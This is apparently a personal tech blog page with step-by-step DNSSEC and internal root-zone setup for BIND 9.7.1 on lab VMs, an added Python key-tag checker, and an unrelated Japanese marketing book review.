lost and found ( for me ? )

how to deploy DNSSEC on Auth Servers

Prepare the DNSSEC test zones (below)

The following environment is used.

http://lost-and-found-narihiro.blogspot.com/2010/06/dns-how-to-deploy-internal-root-zone-jp.html

# named -v
BIND 9.7.1

internal root : hat1-vm 192.168.1.50
internal jp : hat2-vm 192.168.1.51
internal test.co.jp : hat3-vm 192.168.1.52
caching name server : hat4-vm 192.168.1.80

First, before building the chain of trust, make each zone DNSSEC-capable on its own (islands of trust).

[ internal root : hat1-vm ]

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51


- generate KSK

[root@hat1-vm named]# pwd
/var/named  <- directory containing the zone files


[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom .
Generating key pair..++++++ ...........................................................................++++++
K.+008+24796


      -3
           Use an NSEC3-capable algorithm to generate a DNSSEC key. If this
           option is used and no algorithm is explicitly set on the command
           line, NSEC3RSASHA1 will be used by default. Note that RSASHA256 and
           RSASHA512 algorithms are NSEC3-capable.

-a algorithm

- generate ZSK

[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom .
Generating key pair................................+++ ................................+++
K.+008+18525

- modify zone file

Register the KSK and ZSK in the zone file

[root@hat1-vm named]# cat K.+008+*.key > root.key

[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51

$INCLUDE "root.key";

- sign the zone

[root@hat1-vm named]# dnssec-signzone -o . root_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
root_zone_internal.db.signed

- modify named.conf

options {
        directory "/var/named";
        pid-file "/var/run/named/named.pid";
        max-cache-size 20M;
        recursion no;
        version "";
        dnssec-enable yes;  <- this
        dnssec-validation yes;  <- this
};

zone  "." in {
        type master;
#       file "root_zone_internal.db";
        file "root_zone_internal.db.signed"; <- this
        };

- start BIND

[root@hat1-vm named]# named

syslog

Jun 30 00:43:23 hat1-vm named[2243]: zone ./IN: loaded serial 2010062304 (DNSSEC signed)

Check. Looks fine.

[root@hat1-vm named]# dig @127.1 . soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40509
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 20100629144058 18525 . v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZEZkpBSRpKqRoE sJS8DwtylTswMUStdNoQQksh7Am0T+s/C/NzAdw5Q7P4EgEZl0994KJD ecuDWacw8sh4ZA2WTS45X3vpiQdLrhRHuVp0oow5zazUCvs7d3d0PkIn LRGTDSXPvTwrWAVAwfqZc7sOitXxV0w4ZQpoQLNbMDO4c1QFNGbtoWOf lBjX2PBuAcA3vSDQ5045INszrOCBkPcgO5n9yAUddagSDxS41+4827K8 qAy4SaAwuCEkeXCMeRUXl6suh9KFmLtsH4sEnjrHkN8W/trmaRZNKG9O 1NEFhg==


[root@hat1-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2949
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:53 2010
;; MSG SIZE  rcvd: 394

[root@hat1-vm named]#
[root@hat1-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:59 2010
;; MSG SIZE  rcvd: 397

[root@hat1-vm named]#


Verify from the caching server.

Register the internal root's KSK ( K.+008+24796 ) in trusted-keys

      1 options {
      2         directory "/var/named";
      3         pid-file "/var/run/named/named.pid";
      4         max-cache-size 5M;
      5         recursion yes;
      6         version "";
      7         dnssec-enable yes;
      8         dnssec-validation yes;

     21 zone  "." in {
     22         type hint;
     23         file "named.ca";
     24         };

     51 trusted-keys {
     52
     53 "." 257 3 8 "AwEAAbMQ3cEdLfYbAitpiWvfJkWKncHe2PyNwd77jHCwy0eSm7EBtqqo rZ ic53HgeolqwoAxut/m+BmGCTHU8pcbrphiGIxrSz1o4KjzCcchKmvz vClM78IrB9XZA8Z1t wTMf/n2i1aMxSbIrmaP9Ik4eu7xr2RwNu2y6LaJ fFGSF/7Z";
     54
     55 };
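The trusted-keys entry above is copied by hand from the KSK's .key file, and the same key file names (K.+008+24796 for the KSK, K.+008+18525 for the ZSK) appear in the keygen steps. As an added check (example code, not from the post), this Python snippet parses a dnssec-keygen .key file, confirms the record is the KSK (flags 257, SEP bit set) and not the ZSK, recomputes the RFC 4034 key tag and compares it with the tag in the file name, then renders the trusted-keys line. The key file content, file name and the tiny key blob are constructed samples, not the post's real key.

```python
import base64
import re
import struct

# Constructed sample mirroring what `cat K.+008+<tag>.key` prints on the page.
# "AwEAAavN" is a made-up 6-byte blob (not a real RSA key) so the tag can be
# checked by hand; a real 1024-bit KSK has roughly 176 base64 characters.
SAMPLE_KEY_FILE = """\
; This is a key-signing key, keyid 45784, for .
. IN DNSKEY 257 3 8 AwEAAavN
"""
SAMPLE_KEY_FILENAME = "K.+008+45784.key"   # constructed to match the record above

# dnssec-keygen names files K<owner>+<alg, 3 digits>+<key tag, 5 digits>.key
KEY_FILENAME_RE = re.compile(r"^K(?P<name>.+)\+(?P<alg>\d{3})\+(?P<tag>\d{5})\.key$")


def parse_dnskey_file(text):
    """Return (owner, flags, protocol, algorithm, key_b64) from a dnssec-keygen .key file."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        # owner [ttl] [class] DNSKEY flags protocol algorithm key...
        idx = fields.index("DNSKEY")
        owner = fields[0]
        flags, proto, alg = (int(x) for x in fields[idx + 1:idx + 4])
        key_b64 = "".join(fields[idx + 4:])   # the key may be split over several words
        return owner, flags, proto, alg, key_b64
    raise ValueError("no DNSKEY record found")


def key_tag(flags, proto, alg, key_b64):
    """RFC 4034 Appendix B key tag over the DNSKEY RDATA (flags, protocol, alg, key)."""
    rdata = struct.pack("!HBB", flags, proto, alg) + base64.b64decode(key_b64)
    ac = 0
    for i, byte in enumerate(rdata):
        ac += byte << 8 if i % 2 == 0 else byte
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def is_ksk(flags):
    """Flag bit 15 (value 1) is SEP: 257 = zone key + SEP (the KSK), 256 = ZSK."""
    return bool(flags & 0x0001)


def trusted_keys_entry(owner, flags, proto, alg, key_b64):
    """Render one entry for a BIND 9.7 `trusted-keys { ... };` block."""
    return '"%s" %d %d %d "%s";' % (owner, flags, proto, alg, key_b64)


def check_ksk_file(filename, text):
    """Confirm the file holds a KSK whose tag matches the file name; return the trusted-keys line."""
    m = KEY_FILENAME_RE.match(filename)
    if not m:
        raise ValueError("unexpected key file name: %s" % filename)
    owner, flags, proto, alg, key_b64 = parse_dnskey_file(text)
    if not is_ksk(flags):
        raise ValueError("flags %d: this is the ZSK, not the KSK; it does not belong in trusted-keys" % flags)
    if alg != int(m.group("alg")):
        raise ValueError("algorithm %d does not match file name" % alg)
    tag = key_tag(flags, proto, alg, key_b64)
    if tag != int(m.group("tag")):
        raise ValueError("computed key tag %d does not match file name tag %s" % (tag, m.group("tag")))
    return trusted_keys_entry(owner, flags, proto, alg, key_b64)


if __name__ == "__main__":
    print("trusted-keys {")
    print("    " + check_ksk_file(SAMPLE_KEY_FILENAME, SAMPLE_KEY_FILE))
    print("};")
```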

The hints file points at the internal root.

[root@hat4-vm hattori]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50

Now dig. The ad bit is set, so it looks fine.

[root@hat4-vm ~]# dig @127.1 . soa +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15386
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA

;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304 ; serial
3600       ; refresh (1 hour)
900        ; retry (15 minutes)
2592000    ; expire (4 weeks 2 days)
3600       ; minimum (1 hour)
)
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 (
20100629144058 18525 .
v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZE
ZkpBSRpKqRoEsJS8DwtylTswMUStdNoQQksh7Am0T+s/


[root@hat4-vm ~]# dig @127.1 . ns +dnssec +multiline

; <<>> DiG 9.7.1 <<>> @127.1 . ns +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45504
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 86250 IN NS x.root-servers.net.
. 86250 IN RRSIG NS 8 0 86400 20100729144058 (
20100629144058 18525 .
tME2znW74GdLmDOuspJCcrWrAEu45nfEV9iP+k5HidCG
R19q12e3CMjvsWrKJB4M4238rhNipJc9YA+rWMw7bwwD
BgzwTJDI1HAt30eMiEJnAnBqDYoievjDDpSl32TkyuUQ


[ internal jp zone : hat2-vm ]

zone  "jp" in {
        type master;
        file "jp_zone_internal.db";
        };


[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

- generate KSK

[root@hat2-vm named]# pwd
/var/named

# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom jp

- generate ZSK

# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom jp

- modify jp zone file

[root@hat2-vm named]# cat Kjp.+008+*.key > jp.key

[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52

$INCLUDE "jp.key";

- sign jp zone

[root@hat2-vm named]# dnssec-signzone -o jp jp_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
jp_zone_internal.db.signed

[root@hat2-vm named]# named

Jun 30 01:25:19 hat2-vm named[2326]: zone jp/IN: loaded serial 2010062303 (DNSSEC signed)

[root@hat2-vm named]# dig @127.1 jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17885
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA

;; ANSWER SECTION:
jp. 86400 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 86400 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 86400 IN RRSIG NS 8 1 86400 20100729152408 20100629152408 20163 jp. o0KawU5TH51OJq9/uyApCjydNUMuEmLzFOL4yDzDaw+TfHzBfkebRgdQ OFosbykoRBOVYZIy+7x0/B8vYRPvHm5K9tRFFIoxbEmV7RdTsY1NJqvI CB2fjhMJFzO1MS9H87Ws4y/q6aXu4h0+jitILTPV7U2W66YxRqQCHp25 xg6vCz/JI6snXlqAehswnNIRx3yHsIxxdBxReJRxhzJvjdIpLfPRPPcv ILw84+C5xzQCmKTw8CyK4ceS0kVWmriVSjgyKH2fTMJZ6LSNgguvc88q Bf5sGuoEPpJ/9BXV2o7Hj9BdpPXhinvbHc/Wttu6+UUIFfC36Ql9FpqV SOfXPA==

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
x.dns.jp. 86400 IN RRSIG A 8 3 86400 20100729152408 20100629152408 20163 jp. ZRtCXGXRiog8qvAn8OWjt+Ougu5GX7cHeE7TFHGTjGzGc3hVe4uCTFd8 OFKwFdb1Jp0DGZPXw2drjPGKFT/Al/uGHV53f3aacFxXIbd/AL0OGEat nMwYZS6D2a6VMezxZy3TTSc6XO9ZD+7niTtmMdvLAVtjHoO9Q9T6k7AW DVyDMazMF0woaYy8eRxjlCI5eMdp1Wdg+kfoKgAF/Nuv01yx7Ii8p3L7 wwv/odrC9F/lKSvNc17YoGzSsCAtd0TR0gpLNbZwdXXBFLq90hgoICpL kIcQdn2nB9Xu3jzO+N9Dy7TzvGunpMC1jt4nTCe0W5Wcl02laPWdejU4 uFik4g==

;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 01:25:57 2010
;; MSG SIZE  rcvd: 984

[root@hat2-vm named]#
[root@hat2-vm named]# dig @127.1 co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32409
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 3600 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==
jp. 3600 IN NSEC test.co.jp. NS SOA RRSIG NSEC DNSKEY
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729152408 20100629152408 20163 jp. JIQHWC+6W7+geaCUTKC1+DCSZqMKwikcoPZcXCYhOixqNpB9sT6p3R8A fdKf19mMXDyUIUbqN6zDNA1OP7x5gwJ4eFr8Kv+QA5Cafp3NaKkrcoGf iZA0lN+A1nIOVxvtbP9tj8pyOI0Vb+nMuQhbvac9IOVE8hxHzihh+04D tQRSJ/lHlgNyQK1THbwaQDfstw4DzxWyeCOrBHj7Q/4ofpL5XwvjnwfI cMfrj4CBHIHID/64pq6CulfvJwjaCFBU4Jalx99FwxeZ0DD+UY7zVGS5 F/nus3QkDqhO382YFiJp6UHsb/T5uOREq9v0kWe/UDEYg7NZLD0P7KHU 8q4+bw==

This is not part of a chain of trust yet, so the caching-server side is not configured for it yet.

[ test.co.jp : hat3-vm ]


[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52
www.test.co.jp. IN A 10.0.0.1

dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom test.co.jp
dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom test.co.jp


[root@hat3-vm named]# cat Ktest.co.jp.+008+*.key > test.co.jp.key

[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52
www.test.co.jp. IN A 10.0.0.1

$INCLUDE "test.co.jp.key";


[root@hat3-vm named]# dnssec-signzone -o test.co.jp test.co.jp.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
                      ZSKs: 1 active, 0 stand-by, 0 revoked
test.co.jp.db.signed

zone "test.co.jp" {
type master;
# file "test.co.jp.db";
file "test.co.jp.db.signed";
};

Jun 30 01:37:35 hat3-vm named[2764]: zone test.co.jp/IN: loaded serial 2010062303 (DNSSEC signed)


[root@hat3-vm named]# dig @127.1 test.co.jp soa +dnssec

; <<>> DiG 9.7.1 <<>> @127.1 test.co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48852
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;test.co.jp. IN SOA

;; ANSWER SECTION:
test.co.jp. 86400 IN SOA ns.test.co.jp. hostmaster.test.co.jp. 2010062303 3600 900 2592000 3600
test.co.jp. 86400 IN RRSIG SOA 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. TMtWJBFkKfWnBYyu/I1YddPXisB0HHN3YMJGtFvyPzqRzCpByoXGm5dp Hp30+XosNWdAQaNharVcdILUHJPdBAePzhT8HLiNQfTFVTyrLNikRVvp gmDtey8ueI5Kx+78oTwHHWAzcjUgT+9r9R0w4hP8ggjd0VR4KZb1k0rR wpkAuTKcFroJfQTS/7Kk6tYhvJ5DOfkutcQYK5ymhmiQoRKQl0zgDb// 5Lg8DwimbVofIhwDgSJYxKE2qSxN+pu1RFzPWB5snAJ5IOQMDwnAeU3h k0svEta6uzfI8cRPAgKATx47JmGcMCbQ25J2HhrlW52Dc4SaYIKVuO+/ wwCnlA==

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
test.co.jp. 86400 IN RRSIG NS 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. wAVapgwcoYN/BRZODCUC/JeFp/Nfg2r4cVP5vZGQZzalQRmSomVO6Iwv VLlZkajq2XLbS1v5LHIeu/wAWBaA0ms2MQ4eXSUZNmVIMXj3pyYgVTA2 WSENhzKZ2MsNoOJn3D2ypXxrRLB8SF2zLKHI9N4yRNtT6MDUD8PNT46c f2mEQMfotZdmd5tS2A/J13+nB2gCFN8MBxPWvJLnKoDYZUfc3y3the4b 3KpyJMswO4kvy4VqR9rHVYntIr4D5QFcIqxt+GtBjgAgx/W3C8TE+2ca akdiwhnwNuBKCSnAfH+njuc9+J0ReHa+CJO+XIhVCHRF8QBNImxR7odc uRD7VA==

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
ns.test.co.jp. 86400 IN RRSIG A 8 4 86400 20100729153623 20100629153623 8448 test.co.jp. bZgXs0iHMhS8VCbKSYMtYSvbM1qWd2bym4HeMsM2BihmYaFkm9M1BmTy pQEv9Jpb3MuZmW7iA6GWyX2u0xepbRI3CKmZMlzGX6MhuK8a1GgprH+R 2nlx0sLlkP6VT0dmOh1F1ANu6M4RE1zo2lHR++X9vacpqZzpJPhAegNr Aq09u35RnUcUSLo7miQGuO11/CESK76w1GXLXEDjxzkaqEIxIwVCwA9t E4mx7WG3U9zOqMlRgo9vJ5o06EcANhVDASGNCrw9I6AUPr9AYFn/lH/s wIE0eDZPqDkklxATNBCaGqOKL5j5eXEY4sjFSzHn82A0j/2JQkK2EZ/s EqeCrw==

That's it for now.

Cheers!

Book review: マーケティング実践講座

マーケティング実践講座
Author: 須藤和和
Publisher: ダイヤモンド社

As the title says, this is a book on marketing strategy.

What I liked about this book is that it explains the procedure for doing marketing and then, using a real example, explains the strategy from product development through to sales, which makes the structure very easy to follow.

It explains how to think about segmentation, selecting target customers, product development, pricing, promotion, and choosing distribution channels.
As analysis methods it covers SWOT analysis, 3C, 4P, regression analysis and so on, which is very useful.

The explanation of what makes a questionnaire for surveying customer needs good or not was very interesting.
It gives examples of mistakes one tends to make, and I found myself nodding along in many places.

As a real example, it carefully explains what marketing strategy was devised for Suntory DAKARA, from product development through to sales, which helped deepen my understanding.

Specifically, it explains in detail what strategy was presumably taken given the existing competing products (Pocari Sweat, Aquarius), and there was a lot to learn from it.

How to build a sales strategy when competing products exist is a problem I always struggle with, so this is a book whose explanations I felt could be applied in many ways.






DNS: how to deploy internal root zone , jp zone , test.co.jp zone for internal testing

Not sure this configuration is right??..
I may have made mistakes.

internal root : 192.168.1.50 ( hostname : hat1-vm )
internal jp ( co.jp ) : 192.168.1.51 ( hostname : hat2-vm )
test.co.jp : 192.168.1.52 ( hostname : hat3-vm )
caching server : 192.168.1.80 ( hostname : hat4-vm )

All DNS servers are running under KVM ( Kernel-based Virtual Machine).

 # named -v
BIND 9.7.1

[ internal root server ( hat1-vm ) ]

zone  "." in {
        type master;
        file "root_zone_internal.db";
        };

[root@hat1-vm ~]# cat /var/named/root_zone_internal.db 
$TTL 86400
. IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.

x.root-servers.net. IN A 192.168.1.50

jp. IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

co.jp. IN NS x.dns.jp.


[ internal jp (co.jp ) zone ( hat2-vm ) ]

zone  "." in {
        type hint;
        file "named.ca";
        };

zone  "jp" in {
        type master;
        file "jp_zone_internal.db";
        };

The root hint points at the internal root server's IP, 192.168.1.50

[root@hat2-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50
[root@hat2-vm ~]# 

- jp zone

[root@hat2-vm ~]# cat /var/named/jp_zone_internal.db 
$TTL 86400
jp. IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.

x.dns.jp. IN A 192.168.1.51

test.co.jp. NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
[root@hat2-vm ~]# 

[ test.co.jp zone ( hat3-vm ) ]

zone  "." in {
        type hint;
        file "named.ca";
        };

zone "test.co.jp" {
        type master;
        file "test.co.jp.db";
};

[root@hat3-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50
[root@hat3-vm ~]# 
[root@hat3-vm ~]# cat /var/named/test.co.jp.db 
$TTL 86400
test.co.jp.     IN      SOA     ns.test.co.jp. hostmaster.test.co.jp. (
        2010062303
        1h
        15m
        30d
        1h )
        IN      NS      ns.test.co.jp.

ns.test.co.jp.       IN      A       192.168.1.52

www.test.co.jp. IN A 10.0.0.1

[ caching server ( hat4-vm ) ]

options {
        directory "/var/named";
        pid-file "/var/run/named/named.pid";
        max-cache-size 5M;
        recursion yes;
        version "";
};

zone  "." in {
        type hint;
        file "named.ca";
        };

[root@hat4-vm ~]# cat /var/named/named.ca
.                        3600000  IN  NS    X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET.      3600000      A     192.168.1.50


[ Verify that www.test.co.jp resolves from the caching server ]

Name resolution works!

[root@hat4-vm ~]# dig @127.1 www.test.co.jp.

; <<>> DiG 9.7.1 <<>> @127.1 www.test.co.jp.
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42021
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

Tracing from the root:

[root@hat4-vm ~]# dig @192.168.1.50 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29607
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51


[root@hat4-vm ~]# dig @192.168.1.51 www.test.co.jp +norec

